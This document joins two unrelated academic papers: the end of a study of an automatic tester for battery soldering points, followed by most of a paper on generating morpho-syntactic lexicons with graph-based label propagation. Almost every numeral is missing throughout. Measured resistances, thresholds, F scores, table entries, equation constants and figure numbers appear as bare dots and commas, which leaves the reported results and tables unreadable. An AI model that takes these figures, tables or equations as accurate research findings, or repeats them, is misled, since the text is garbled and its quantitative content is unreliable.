( ) first, adjust the distance between both guide rails to suit the battery width. the adjusting equipment is shown in figure . open the front fixing handles ( pcs), switch the type selector to the desired type, push the guide rail tightly to the end point, and finally lock the fixing handles ( pcs). secondly, open the rear fixing handles ( pcs), adjust the inside width of the guide rail to be mm larger than the battery width, and then lock the fixing handles ( pcs).

fig. : automatic testing system. fig. : adjusting equipment.

( ) advance air cylinder b (by switch no. ) and loosen the screw on air cylinder b, then adjust the position of air cylinder b according to the testing position of the battery, making sure that photo switch phs turns on once the front of the battery is sensed, as shown in figure .
( ) adjust the distance between photo sensor phs and a to fit the battery length; once the first battery is sensed by photo switch phs , the air cylinder advances to hold the second battery, as shown in figure .

fig. : battery in system (stopper plate). fig. : two batteries in system (stopping plate).

( ) put one battery into the testing area, turn on and adjust air cylinder b (by switch no. ) to hold the front of the battery, and then position air cylinder b. lower air cylinder d (by switch no. ), loosen the hand wheel of the up-down fixed poles and the handle of the forward-backward moving plate, adjust them according to the battery height (so that the probes touch the welded surface of the element group), make sure each probe touches the plates, and then lock the hand wheel and handle.
( ) adjust the position of sensor phs according to the length of the battery, moving it left or right so that the center of the battery is aligned with the center of air cylinder e, to control the ng (reject) battery position shown in figure .

fig. : ng battery position.

experiment process and result

when inspecting a storage battery, the test power signal (v ) is applied to the soldering points, and the first and second inspecting terminals are coupled to the soldering points in pairs using the probes. since each soldering point has a small resistance (r ), the electric currents flowing through the soldering points under the test signal (v ) can be converted by the analog-to-digital converting module into digital signals and thence into resistance values corresponding to the soldering points.
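the pass/fail decision that follows from these resistance readings can be sketched as below; the threshold is battery-type specific and configured on the controller, so the value used here is purely illustrative.

```python
def judge_soldering_points(millivolt_drops, threshold_mv):
    """Flag each soldering point as good or bad by comparing its voltage drop,
    measured at a fixed test current (and hence proportional to resistance),
    against a configured threshold."""
    return [{"point": i + 1, "mV": mv, "ok": mv <= threshold_mv}
            for i, mv in enumerate(millivolt_drops)]

# example with made-up readings for a five-strap battery and an assumed 2.0 mV limit
for result in judge_soldering_points([1.2, 1.1, 1.3, 1.2, 2.8], threshold_mv=2.0):
    print(result)
```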
if the resistance value of one of the soldering points exceeds the threshold, that soldering point is determined to be a poor connection that needs to be re-soldered. since the inspection of the soldering points is conducted by the inspection unit using electrical signals, the quality of the soldering points can be accurately determined. furthermore, by outputting the inspection results through the transmission interface, the results can be stored for future evaluation of the quality of a batch of storage battery products.

the testing machine can be installed in the auto-production line to inspect the soldering points of a v- ah battery. the resistance values of the soldering points are shown in figure ; they are . , . , . , . and . , respectively. the results show that each tab has a different internal resistance, and each sampling of the surface resistance is not the same; however, when the measured value is over . , it indicates that the soldering point has failed. the figure shows the resistance values . , . , . , . and . ; the last value is clearly above the general level. after inspecting this battery, we find that the standard of the soldering level reaches only %. in order to have more examples, we tested batteries, whose results are shown in table . certainly, different types of battery have different internal resistances, and the standard was established by examining ten batteries. of course, the inspection machine we propose is not perfect; the manufacturer has to combine it with practical experience for precise inspection. when the machine was used to inspect real battery soldering points, it was found that approximately of every , batteries did not meet the requirements. these batteries were inspected individually; if the electrode tab height was uneven, it was corrected and the battery was retested. afterwards, one defective product with poor soldering remained on the right and left.

fig. : the resistance values of the soldering points shown on the meter. fig. : another set of resistance values of the soldering points shown on the meter.

table : test results for batteries. batt-spec: v- ah ( . mv and above indicates a bad soldering point); spot checking record (test current . a); columns solder( ) to solder( ) list the measured voltage drops in mv for each battery.

conclusions

this study successfully developed a microprocessor-controlled battery soldering point testing machine with automatic plc operation. this machine can quickly identify batteries with poor soldering points and does not affect battery quality. in addition, the soldering point testing machine can be used in conjunction with a computer to record battery soldering point characteristics for use in subsequent battery tracking.

references

[ ] z. m. salameh, m. a. casacca and w. a.
lynch, "a mathematical model for lead-acid batteries," ieee trans. on energy conversion.
[ ] y. h. kim and h. d. ha, "design of interface circuits with electrical battery models," ieee trans. on industrial electronics.
[ ] s. sato and a. kawamura, "a new estimation method of state of charge using terminal voltage and internal resistance for lead-acid battery," power conversion conference.
[ ] a. kawamura and t. yanagihara, "state of charge estimation of sealed lead-acid batteries used for electric vehicles," ieee pesc record.
[ ] t. palanisamy, "charging techniques for a universal lead-acid battery charger," power sources symposium.
[ ] e. m. valeriote, t. g. chang and d. m. jochim, "fast charging of lead-acid batteries," battery conference on applications and advances.
[ ] c. c. hua and m. y. lin, "a study of charging control of lead-acid battery for electric vehicles," ieee industrial electronics.

morpho-syntactic lexicon generation using graph-based semi-supervised learning
manaal faruqui, carnegie mellon university, mfaruqui@cs.cmu.edu
ryan mcdonald, google inc., ryanmcd@google.com
radu soricut, google inc., rsoricut@google.com

abstract. morpho-syntactic lexicons provide information about the morphological and syntactic roles of words in a language. such lexicons are not available for all languages and even when available, their coverage can be limited. we present a graph-based semi-supervised learning method that uses the morphological, syntactic and semantic relations between words to automatically construct wide coverage lexicons from small seed sets. our method is language-independent, and we show that we can expand a word seed lexicon to more than times its size with high quality for languages. in addition, the automatically created lexicons provide features that improve performance in two downstream tasks: morphological tagging and dependency parsing.

introduction

morpho-syntactic lexicons contain information about the morphological attributes and syntactic roles of words in a given language. a typical lexicon contains all possible attributes that can be displayed by a word. table shows some entries in a sample english morpho-syntactic lexicon. as these lexicons contain rich linguistic information, they are useful as features in downstream nlp tasks like machine translation (nießen and ney; minkov et al.; green and denero), part of speech tagging (schmid; denis and sagot; moore), dependency parsing (goldberg et al.), language modeling (arisoy et al.) and morphological tagging (müller and schuetze), inter alia.

table : a sample english morpho-syntactic lexicon.
played — pos:verb, tense:past, vform:fin, ...
playing — pos:verb, tense:pres, vform:ger, ...
awesome — pos:adj, degree:pos

there are three major factors that limit the use of such lexicons in real world applications: ( ) they are often constructed manually and are expensive to obtain (kokkinakis et al.; dukes and habash); ( ) they are currently available for only a few languages; and ( ) the size of available lexicons is generally small. in this paper, we present a method that takes as input a small seed lexicon, containing a few thousand annotated words, and outputs an automatically constructed lexicon which contains morpho-syntactic attributes (henceforth referred to as attributes) for a large number of words of a given language.
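for concreteness, a lexicon of the kind shown in table can be represented as a simple mapping from word types to attribute sets; the entries below mirror the table and are the only assumption made.

```python
# a tiny seed lexicon in the spirit of the table above: word type -> set of attributes
seed_lexicon = {
    "played":  {"POS:VERB", "TENSE:PAST", "VFORM:FIN"},
    "playing": {"POS:VERB", "TENSE:PRES", "VFORM:GER"},
    "awesome": {"POS:ADJ", "DEGREE:POS"},
}

def attributes(word, lexicon):
    """Return the known attributes of a word, or an empty set if it is unlabeled."""
    return lexicon.get(word, set())
```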
we model the problem of morpho-syntactic lexicon generation as a graph-based semi-supervised learning problem (zhu; bengio et al.; subramanya and talukdar). we construct a graph where nodes represent word types and the goal is to label them with attributes. the seed lexicon provides attributes for a subset of these nodes. nodes are connected to each other through edges that denote features shared between them or surface morphological transformations between them.

our entire framework of lexicon generation, including the label propagation algorithm and the feature extraction module, is language independent. we only use word-level morphological, semantic and syntactic relations between words that can be induced from unannotated corpora in an unsupervised manner.

figure : a subgraph from the complete graph of english showing different kinds of features shared on the edges between words (e.g. cluster identity, prefix:pl, suffix:{null}:ed, suffix:ing:ed). some possible features/edges have been removed for enhancing clarity.

one particularly novel aspect of our graph-based framework is that edges are featurized. some of these features measure similarity, e.g., singular nouns tend to occur in similar distributional contexts as other singular nouns, but some also measure transformations from one inflection to another, e.g., adding an 's' suffix could indicate flipping the num:sing attribute to num:plur (in english). for every attribute to be propagated, we learn weights over features on the edges separately. this is in contrast to traditional label propagation, where edges indicate similarity exclusively (zhu).

we construct lexicons in languages of varying morphological complexity. we perform intrinsic evaluation of the quality of generated lexicons obtained from either the universal dependency treebank or created manually by humans (§ ). we show that these automatically created lexicons provide useful features in two extrinsic nlp tasks which require identifying the contextually plausible morphological and syntactic roles: morphological tagging (hajič and hladká; hajič) and syntactic dependency parsing (kübler et al.). we obtain an average of . % and . % error reduction across languages for morphological tagging and dependency parsing respectively on a set of publicly available treebanks (§ ). we anticipate that the lexicons thus created will be useful in a variety of nlp problems.

graph construction

the approach we take propagates information over lexical graphs (§ ). in this section we describe how to construct the graph that serves as the backbone of our model. we construct a graph in which nodes are word types and directed edges are present between nodes that share one or more features. edges between nodes denote that there might be a relationship between the attributes of the two nodes, which we intend to learn. as we want to keep our model language independent, we use edge features that can be induced between words without using any language-specific tools. to this end, we describe three features in this section that can be obtained using unlabeled corpora for any given language. fig.
shows a subgraph of the full graph constructed for english.

word clusters. previous work has shown that unlabeled text can be used to induce unsupervised word clusters which can improve the performance of many nlp tasks in different languages (clark; koo et al.; turian et al.; faruqui and padó; täckström et al.; owoputi et al.). word clusters capture semantic and syntactic similarities between words; for example, play and run are present in the same cluster. we obtain word clusters by using the exchange clustering algorithm (kneser and ney; martin et al.; uszkoreit and brants) on a large unlabeled corpus of every language. as in täckström et al., we use one year of news articles scraped from a variety of sources and cluster only the most frequent m words into different clusters. an edge was introduced for every word pair sharing the same word cluster, and a feature for that cluster is fired. thus, there are as many possible cluster features on an edge as there are clusters, though in our case only a single one can fire.

suffix & prefix. suffixes are often strong indicators of the morpho-syntactic attributes of a word (ratnaparkhi; clark). for example, in english, -ing denotes gerund verb forms like studying and playing, and -ed denotes past tense like studied and played. prefixes like un- and in- often denote adjectives. thus we include both -gram and -gram (footnote: some of these features can cause the graph to become very dense, making label propagation prohibitive. we keep the size of the graph in check by only allowing a word node to be connected to at most other, randomly selected, word nodes sharing one particular feature. this reduces edges while still keeping the graph connected.)
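a minimal sketch of how the featurized edges described so far (shared cluster, shared suffix or prefix) could be assembled into a graph; the cluster assignment, the affix lengths and the per-feature fan-out cap are assumptions, since the exact settings are not recoverable here.

```python
import random
from collections import defaultdict

def build_edges(words, cluster_of, max_neighbors=10, affix_lens=(2, 3)):
    """Connect word pairs that share a cluster, suffix or prefix, recording the
    shared feature on each directed edge; fan-out per feature is capped to keep
    the graph sparse, as described above."""
    buckets = defaultdict(set)
    for w in words:
        buckets[("clus", cluster_of[w])].add(w)
        for n in affix_lens:
            if len(w) > n:
                buckets[("suffix", w[-n:])].add(w)
                buckets[("prefix", w[:n])].add(w)

    edges = defaultdict(set)  # (w, v) -> set of shared edge features
    for feat, members in buckets.items():
        for w in members:
            others = list(members - {w})
            random.shuffle(others)
            for v in others[:max_neighbors]:
                edges[(w, v)].add(feat)
    return edges
```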
the features described in this section are specially suitable for languages that exhibit concatenative morphology, like english, german, greek etc. and might not work very well with languages that exhibit non- concatenative morphology i.e, where root modifica- tion is highly frequent like in arabic and hebrew. we only include those suffix and prefix which appear at least twice in the seed lexicon. our model will learn the following transformation: tense:past: → - , tense:present: - → (§ ). however, it is important to note that our framework is not limited to just the features described here, but can incorporate any arbitrary information over word pairs (§ ). graph-based label propagation we now describe our model. let w = {w ,w , . . . ,w|w|} be the vocabulary with |w| words and a = {a ,a , . . . ,a|a|} be the set of lexical attributes that words in w can ex- press; e.g. w = {played,playing, . . .} and a = {num:sing, num:plur, tense:past, . . .}. each word type w ∈ w is associated with a vec- tor aw ∈ [− , ]|a|, where ai,w = indicates that word w has attribute i and ai,w = − indicates its absence; values in between are treated as degrees of uncertainty. for example, tense:pastplayed = and tense:pastplaying = − . the vocabulary w is divided into two disjoint subsets, the labeled words l for which we know their aw’s (obtained from seed lexicon) and the un- labeled words u whose attributes are unknown. in general |u| � |l|. the words in w are organized into a directed graph with edges e between words. let, vector φ(w,v) ∈ [ , ]|f| denote the features on the directed edge between words w and v, with indicating the presence and the absence of fea- ture fk ∈ f, where, f = {f ,f , . . . ,f|f|} are the set of possible binary features shared between two words in the graph. for example, the features on edges between played and playing from fig. are: φk(played,playing) =    , iffk = suffix:ed:ing , iffk = prefix:pl , iffk = suffix:ly . . . we seek to determine which subsets of a are valid for each word w ∈ w. we learn how a particular attribute of a node is a function of that particular attribute of its neighboring nodes and features on the edge connecting them. let ai,w be an attribute of word w and let âi,w be the empirical estimate of that we constrain ai,w ∈ [− , ] as its easier to model the flip- ping of an attribute value from − to as opposed to [ , ]. we use labeled, seed, and training lexicon to mean the same thing interchangeably. < , - , …, - > < , , …, > < . , . , …, . > < , - , …, - > < . , . , …, . > <- , - , …, - > < , , …, > < , - , …, > < , , …, - > figure : word graph with edges between words showing the labeled (grey) and the unlabeled (white) word nodes. only nodes connected via solid edges are visible to each other, dotted edges block visibility. this figure demonstrates interaction between nodes during model estimation (left), label propagation (center), and paradigm projection (right). attribute-value vectors of the words are shown in angled brackets. the solid edge in the right figure shows the closest attribute paradigm to which the empirical vector is projected. attribute. we posit that âi,w can be estimated from the neighbors n(w) of w as follows: âi,w = tanh   ∑ v∈n(w) (φ(w,v) ·θi)×ai,v   ( ) where, θi ∈ r|f| is weight vector of the edge fea- tures for estimating attribute ai. ‘·’ represents dot product betwen two vectors. we use tanh as the non- linearity to make sure that âi,w ∈ [− , ]. 
the set of such weights θ ∈ r|a|×|f| for all attributes are the model parameters that we learn. our graph resem- bles the ising model, which is a lattice model pro- posed for describing intermolecular forces (ising, ), and eq. solves the naive mean field approx- imation of the ising model (wang et al., ). intuitively, one can view the node to node mes- sage function from v to w: φ(w,v)·θi×ai,v as either ( ) supporting the value ai,v when φ(w,v) ·θi > ; ( ) inverting ai,v when φ(w,v) · θi < ; or ( ) dampening or neutering ai,v when φ(w,v) ·θi ≈ . returning to our motivation, if w = played and v = playing, a feature indicating the suffix sub- stitution suffix:ed:ing should have a highly nega- tive weight for tense:past, indicating a change in value. this is because tense:past = - for play- ing, and a negative value of φ(w,v) ·θi will push it to positive for played. it should be noted that this framework for con- structing lexicons does not explicitly distinguish between morpho-syntactic paradigms, but simply identifies all possible attribute-values a word can take. if we consider an example like “games” and two attributes, the syntactic part-of-speech, pos, and number, num, games can either be ) {pos:verb, num:sing}, as in john games the system; or {pos:noun, num:plur}, as in the games have started. our framework will mereley return that all the above attribute-values are possi- ble, which implies that the singluar noun and plu- ral verb interpretations are valid. one possible way to account for this is to make full morphological paradigms the “attributes” in or model. but this leads to slower runtimes and sparser learning. we leave as future work extensions to full paradigm pre- diction. our framework has three critical components, each described below: ( ) model estimation, i.e., learning θ; ( ) label propagation to u; and option- ally ( ) paradigm projection to known valid morpho- logical paradigms. the overall procedure is illus- trated in figure and made concrete in algorithm . . model estimation we estimate all individual elements of an attribute vector using eq. . we define loss as the squared loss between the empirical and observed attribute vectors data: w, l, u, a, f, p result: θ, labeled u // model estimation while not convergence do for w ∈l do loss ←‖aw − âw‖ update θ using ∂loss ∂θ // label propagation while not convergence do for w ∈u do aw ← âw // paradigm projection for w ∈u do mindist ←∞, closest ←∅ for p ∈p do dist ←‖aw −p‖ if dist < mindist then mindist ← dist, closest ← p aw ← closest algorithm : graph-based semi-supervised label propagation algorithm. on every labeled node in the graph, thus the total loss can be computed as: ∑ w∈l ‖aw − âw‖ ( ) we train the edge feature weights θ by minimiz- ing the loss function in eq. . in this step, we only use labeled nodes and the edge connections between labeled nodes. as such, this is strictly a supervised learning setup. we minimize the loss function using online adaptive gradient descent (duchi et al., ) with ` regularization on the feature weights θ. this is the first step in algorithm (lines – ). . label propagation in the second step, we use the learned weights of the edge features to estimate the attribute val- ues over unlabeled nodes iteratively. the attribute vector of all unlabeled words is initialized to null, ∀w ∈ u,aw = 〈 , , . . . , 〉. in every iteration, an unlabeled node estimates its empirical attributes by looking at the corresponding attributes of its labeled and unlabeled neighbors using eq. 
, thus this is the semi-supervised step. we stop after the squared euclidean distance between the attribute vectors at two consecutive iterations for a node becomes less than . (averaged over all unlabeled nodes). this is the second step in algorithm (lines – ). after convergence, we can directly obtain attributes for a word by thresholding: a word w is said to possess an attribute ai if ai,w > . . paradigm projection since a word can be labeled with multiple lexical at- tributes, this is a multi-label classification problem. for such a task, several advanced methods that take into account the correlation between attributes have been proposed (ghamrawi and mccallum, ; tsoumakas and katakis, ; fürnkranz et al., ; read et al., ), here we have adopted the binary relevance method which trains a classi- fier for every attribute independently of the other at- tributes, for its simplicity (godbole and sarawagi, ; zhang and zhou, ). however, as the decision for the presence of an attribute over a word is independent of all the other attributes, the final set of attributes obtained for a word in § . might not be a valid paradigm. for ex- ample, a word cannot only exhibit the two attributes pos:noun and tense:past, since the presence of the tense attribute implies pos:verb should also be true. further, we want to utilize the inherent correlations between attribute labels to obtain bet- ter solutions. we thus present an alternative, simpler method to account for this problem. to ensure that we obtain a valid attribute paradigm, we project the empirical attribute vector obtained after propagation to the space of all valid paradigms. we first collect all observed and thus valid at- tribute paradigms from the seed lexicon (p = {aw|w ∈ l}). we replace the empirical at- tribute vector obtained in § . by a valid attribute paradigm vector which is nearest to it according to euclidean distance. this projection step is inspired from the decoding step in label-space transforma- tion approaches to multilabel classification (hsu et al., ; ferng and lin, ; zhang and schnei- der, ). this is the last step in algorithm (lines – ). we investigate for each language if paradigm a paradigm is defined as a set of attributes. |l| |w| |e| |a| |p| prop (k) (k) (m) (k) eu . bg . hr . cs . , da . en . , fi . , el . hu . it . sv . table : graph statistics for different languages, showing the approximate number of labeled seed nodes (|l|), la- beled and unlabeled nodes (|w|), edges between words (|e|), the number of unique attributes (|a|), attribute paradigms (|p|) and size of the constructed lexicon (prop). k: thousands, m: millions. projection is helpful (§ . ). intrinsic evaluation to ascertain how our graph-propagation framework predicts morphological attributes for words, we pro- vide an intrinsic evaluation where we compare pre- dicted attributes to gold lexicons that have been ei- ther read off from a treebank or derived manually. . dependency treebank lexicons the universal dependency treebank (mcdonald et al., ; de marneffe et al., ; agić et al., ) contains dependency annotations for sentences and morpho-syntactic annotations for words in context for a number of languages. a word can display dif- ferent attributes depending on its role in a sentence. in order to create morpho-syntactic lexicon for ev- ery language, we take the union of all the attributes that the word realizes in the entire treebank. 
although it is possible that this lexicon might not contain all realizable attributes if a particular attribute or paradigm is not seen in the treebank (we address this issue in § . ), the utility of evaluating against treebank-derived lexicons is that it allows us to evaluate on a large set of languages. in particular, in the universal dependency treebanks v . (agić et al., ; we use version . , released in may ), diverse languages contain the morphology layer, including romance, germanic and slavic languages plus isolates like basque and greek. we use the train/dev/test set of the treebank to create training (seed), development and test lexicons for each language. we exclude words from the dev and test lexicons that have been seen in the seed lexicon. for every language, we create a graph with the features described in § with words in the seed lexicon as labeled nodes. the words from the development and test sets are included as unlabeled nodes for the propagation stage. table shows statistics about the constructed graph for different languages. we perform feature selection and hyperparameter tuning by optimizing prediction on words in the development lexicon and then report results on the test lexicon. the decision whether paradigm projection (§ . ) is useful or not is also taken by tuning performance on the development lexicon. table shows the features that were selected for each language. now, for every word in the test lexicon we obtain predicted lexical attributes from the graph. for a given attribute, we count the number of words for which it was correctly predicted (true positive), wrongly predicted (false positive) and not predicted (false negative). aggregating these counts over all attributes (a), we compute the micro-averaged f score and achieve . % on an average across languages (cf. table ). note that this systematically underestimates performance due to the effect of missing attributes/paradigms that were not observed in the treebank. propagated lexicons. the last column in table shows the number of words in the propagated lexicon, and the first column shows the number of words in the seed lexicon. the ratio of the size of the propagated and seed lexicons is different across languages, which presumably depends on how densely connected each language's graph is. for example, for english the propagated lexicon is around times larger than the seed lexicon, whereas for czech, it is times larger. we can individually tune how densely connected a graph we want for each language depending on the seed size and feature sparsity, which we leave for future work. (we only include those words in the seed lexicon that occur at least twice in the training set of the treebank. words from the news corpus used for word clustering are also used as unlabeled nodes. note that the size of the constructed lexicon (cf. table ) is always less than or equal to the total number of unlabeled nodes in the graph because some unlabeled nodes are not able to collect enough mass for acquiring an attribute, i.e., ∀a ∈ a : aw < , and thus they remain unlabeled (cf. § . ).)

clus suffix prefix morphtrans proj
eu x x x
bg x x
hr x x x
cs x x x x x
da x x x
en x x x
fi x x
el x x x x
hu x x x
it x x x
sv x x x
table : features selected and the decision of paradigm projection (proj) tuned on the development lexicon for each language. x denotes a selected feature.

selected edge features.
the features most frequently selected across all the languages are the word cluster and the surface morphological transformation features. this essentially translates to having a graph that consists of small connected components of words having the same lemma (discovered in an unsupervised manner) with semantic links connecting such components using word cluster features. suffix features are useful for highly inflected languages like czech and greek, while the prefix feature is only useful for czech. overall, the selected edge features for different languages correspond well to the morphological structure of these languages (dryer, ). corpus baseline. we compare our results to a corpus-based method of obtaining morpho-syntactic lexicons. we hypothesize that if we use a morphological tagger of reasonable quality to tag the entire wikipedia corpus of a language and take the union of all the attributes for a word type across all its occurrences in the corpus, then we can acquire all possible attributes for a given word, hence producing a lexicon of reasonable quality. moore ( ) used this technique to obtain a high-quality tag dictionary for pos-tagging. we thus train a morphological tagger (detail in § . ) on the training portion of the dependency treebank and use it to tag the entire wikipedia corpus. for every word, we add an attribute to the lexicon if it has been seen at least k times for the word in the corpus, where k ∈ [ , ]. this threshold on the frequency of the word-attribute pair helps prevent noisy judgements. we tune k for each language on the development set and report results on the test set in table . we call this method the corpus baseline. it can be seen that for every language we outperform this baseline, which on average has an f score of . %.

words corpus propagation
eu . .
bg . .
hr . .
cs . .
da . .
en . .
fi . .
el . .
hu . .
it . .
sv . .
avg. . .
table : micro-averaged f score (%) for prediction of lexical attributes on the test set using our propagation algorithm (propagation) and the corpus-based baseline (corpus). also shown is the no. of words in the test set.

words f
cs , .
fi , .
hu , .
avg. , .
table : micro-averaged f score (%) for prediction of lexical attributes on the test lexicon of human-curated lexicons.

. manually curated lexicons we have now shown that it is possible to automatically construct large lexicons from smaller seed lexicons. however, the seed lexicons used in § . have been artificially constructed by aggregating attributes of word types over the treebank. thus, it can be argued that these constructed lexicons might not be complete, i.e., the lexicon might not exhibit all possible attributes for a given word. on the other hand, manually curated lexicons are unavailable for many languages, inhibiting proper evaluation.

word exchange cluster∗ lowercase(word) capitalization { , , }-g suffix∗ digit { , , }-g prefix∗ punctuation
table : features used to train the morphological tagger on the universal dependency treebank. ∗: on for word offsets {- , - , , , }. conjunctions of the above are also included.

to test the utility of our approach on manually curated lexicons, we investigate publicly available lexicons for finnish (pirinen, ), czech (hajič and hladká, ) and hungarian (trón et al., ). we eliminate numbers and punctuation from all lexicons. for each of these languages, we select words for training and the rest of the word types for evaluation. we train models obtained in § .
for a given language using suffix, brown and morpholog- ical transformation features with paradigm projec- tion. the only difference is the source of the seed lexicon and test set. results are reported in table averaged over different randomly selected seed set for every language. for each language we ob- tain more than % f score and on an average ob- tain . %. critically, the f score on human cu- rated lexicons is higher for each language than the treebank constructed lexicons, in some cases as high as % absolute. this shows that the average . % f score across all languages is likely underesti- mated. extrinsic evaluation we now show that the automatically generated lex- icons provide informative features that are useful in two downstream nlp tasks: morphological tagging (§ . ) and syntactic dependency parsing (§ . ). . morphological tagging morphological tagging is the task of assigning a morphological reading to a token in context. the morphological reading consists of features such as part of speech, case, gender, person, tense etc. none seed propagation eu . . . bg . . . hr . . . cs . . . da . . . en . . . fi . . . el . . . hu . . . it . . . sv . . . avg. . . . table : macro-averaged f score (%) for morphologi- cal tagging: without using any lexicon (none), with seed lexicon (seed), with propagated lexicon (propagation). (oflazer and kuruöz, ; hajič and hladká, ). the model we use is a standard atomic se- quence classifier, that classifies the morphological bundle for each word independent of the others (with the exception of features derived from these words). specifically, we use a linear svm model classifier with hand tuned features. this is similar to com- monly used analyzers like svmtagger (giménez and marquez, ) and matetagger (bohnet and nivre, ). our taggers are trained in a language independent manner (hajič, ; smith et al., ; müller et al., ). the list of features used in training the tagger are listed in table . in addition to the stan- dard features, we use the morpho-syntactic attributes present in the lexicon for every word as features in the tagger. as shown in müller and schuetze ( ), this is typically the most important feature for mor- phological tagging, even more useful than clusters or word embeddings. while predicting the contex- tual morphological tags for a given word, the mor- phological attributes present in the lexicon for the current word, the previous word and the next word are used as features. we use the same languages from the univer- sal dependency treebanks (agić et al., ) that contain morphological tags to train and evaluate the morphological taggers. we use the pre-specified train/dev/test splits that come with the data. ta- ble shows the macro-averaged f score over all none seed propagation eu . . . bg . . . hr . . . cs . . . da . . . en . . . fi . . . el . . . hu . . . it . . . sv . . . avg. . . . table : labeled accuracy score (las, %) for depen- dency parsing: without using any lexicon (none), with seed (seed), with propagated lexicon (propagation). attributes for each language on the test lexicon. the three columns show the f score of the tagger when no lexicon is used; when the seed lexicon derived from the training data is used; and when label prop- agation is applied. overall, using lexicons provides a significant im- provement in accuracy, even when just using the seed lexicon. for out of languages, the high- est accuracy is obtained using the lexicon derived from graph propagation. in some cases the gain is quite substantial, e.g., . 
% → . % for bulgar- ian. overall there is . % and . % absolute im- provement over the baseline and seed resp., which corresponds roughly to a % and % relative re- duction in error. it is not surprising that the seed lexicon performs on par with the derived lexicon for some languages, as it is derived from the train- ing corpus, which likely contains the most frequent words of the language. . dependency parsing we train dependency parsers for the same uni- versal dependency treebanks that contain the mor- phological layer (agić et al., ). we again use the supplied train/dev/test split of the dependency treebank to develop the models. our parsing model is the transition-based parsing system of zhang and nivre ( ) with identical features and a beam of size . we augment the features of zhang and nivre figure : micro-average f score on test lexicon while using varying seed sizes for cs, hu and fi. ( ) in two ways: using the context-independent morphological attributes present in the different lex- icons; and using the corresponding morphological taggers from § . to generate context-dependent at- tributes. for each of the above two kinds of features, we fire the attributes for the word on top of the stack and the two words on at the front of the buffer. ad- ditionally we take the cross product of these features between the word on the top of the stack and at the front of the buffer. table shows the labeled accuracy score (las) for all languages. overall, the generated lexicon gives an improvement of absolute . % point over the baseline ( . % relative reduction in error) and . % over the seed lexicon on an average across languages. critically this improvement holds for / languages over the baseline and / lan- guages over the system that uses seed lexicon only. further analysis in this section we further investigate our model and results in detail. size of seed lexicon. we first test how the size of the seed lexicon affects performance of attribute prediction on the test set. we use the manually constructed lexicons described in § . for experi- ments. for each language, instead of using the full seed lexicon of words, we construct sub- sets of this lexicon by taking and ran- domly sampled words. we then train models ob- tained in § . on these lexicons and plot the perfor- mance on the test set in figure . on average across word attributes en study (seed) pos:verb, vform:fin, mood:ind, tense:pres, num:sing, pos:noun studied pos:verb, vform:fin, mood:ind, tense:past, vform:part taught pos:verb, vform:fin, mood:ind, tense:past, vform:part, voice:pass it tavola (seed) pos:noun, gender:fem, num:sing tavoli pos:noun, gender:masc, num:plur divano pos:noun, gender:masc, num:sing table : attributes induced for words which are semantically or syntactically related to a word in the seed lexicon for english and italian. vform:ger num:plur clus: + clus: + clus: + clus: + clus: + clus: + suffix:ing:{null} - suffix:ies:y - suffix:ping:{null} - suffix:gs:g - suffix:ing:er - suffix:ons:on - table : highest (upper half) and lowest (lower half) weighted features (with their sign) for predicting a given attribute of english words. three languages, we observe that the absolute perfor- mance improvement from to seed words is ≈ % whereas it reduces to ≈ % from to words. feature analysis. table shows the highest and the lowest weighted features for predicting a given attribute of english words. 
the highest weighted features for both vform:ger and num:plur are word clusters, indicating that word clusters exhibit strong syntactic and semantic coherence. more interestingly, it can be seen that for predicting vform:ger, i.e., continuous verb forms, the lowest weighted features are those morphological transformations that substitute “ing” with something else. thus, if there exists an edge between the words studying and study containing the feature suffix:ing:{null}, the model would correctly predict that studying is vform:ger even though study is not, since the negative feature weight can flip the label value. the same observation holds true for num:plur. feature ablation. one key question is which of the features in our graph are important for projecting morphological attribute-values. table suggests that this is language specific, which is intuitive, as morphology can be represented more or less regularly through the surface form depending on the language. to understand this, we did a feature ablation study for the three languages with manually curated lexicons (§ . ) using the same feature set as before: clusters, suffix and morphological transformations with paradigm projection. we then leave out each feature to measure how performance drops. unlike § . , we do not average over runs but use a single static graph where features (edges) are added or removed as necessary.

cs hu fi
s + c + mt . . .
s + c . . .
s + mt . . .
c + mt . . .
s + c + mt + p . . .
table : feature ablation study for induced lexicons evaluated on manually curated gold lexicons. reported scores are micro-averaged f score (%) for prediction of lexical attributes. s = suffix; p = prefix; c = clusters; and mt = morphological transformations.

table contains the results. critically, all features are required for top accuracy across all languages and leaving out suffix features has the most detrimental effect. this is not surprising considering all three languages primarily express morphological properties via suffixes. furthermore, suffix features help to connect the graph and assist label propagation. note that the importance of suffix features here is in contrast to the evaluation on treebank-derived lexicons in § . , where suffix features were only selected for out of languages based on the development data (table ), and not for hungarian and finnish. this could be due to the nature of the lexicons derived from treebanks versus complete lexicons constructed by humans. additionally, we also added back prefix features and found that, for all languages, this resulted in a drop in accuracy, particularly for finnish and hungarian. the primary reason for this is that prefix features often create spurious edges in the graph. this in and of itself is not a problem for our model, as the edge weights should learn to discount this feature. however, the fact that we sample edges to make inference tractable means that more informative edges could be dropped in favor of those that are only connected via a prefix feature. prediction examples. table shows examples of predictions made by our model for english and italian. for each language, we first select a random word from the seed lexicon, then we pick one syntactically and one semantically related word to the selected word from the set of unlabeled words. for example, in italian tavola means table, whereas tavoli is the plural form and divano means sofa. we correctly identify attributes for these words.
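the intrinsic evaluation and the ablation above report micro-averaged f scores, computed by aggregating per-attribute true positive, false positive and false negative counts over all attributes before taking precision and recall. a minimal sketch of that aggregation follows; the dictionary names and the toy example are illustrative, not taken from the paper.

def micro_f1(gold, pred):
    # gold and pred map each test word to its set of attribute-value labels
    tp = fp = fn = 0
    for word, gold_attrs in gold.items():
        pred_attrs = pred.get(word, set())
        tp += len(gold_attrs & pred_attrs)   # correctly predicted attributes
        fp += len(pred_attrs - gold_attrs)   # wrongly predicted attributes
        fn += len(gold_attrs - pred_attrs)   # attributes that were not predicted
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return 2 * precision * recall / (precision + recall) if precision + recall else 0.0

# toy example: one attribute missed and one spurious prediction for "games"
gold = {"played": {"pos:verb", "tense:past"}, "games": {"pos:noun", "num:plur"}}
pred = {"played": {"pos:verb", "tense:past"}, "games": {"pos:noun", "num:sing"}}
print(micro_f1(gold, pred))  # 0.75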
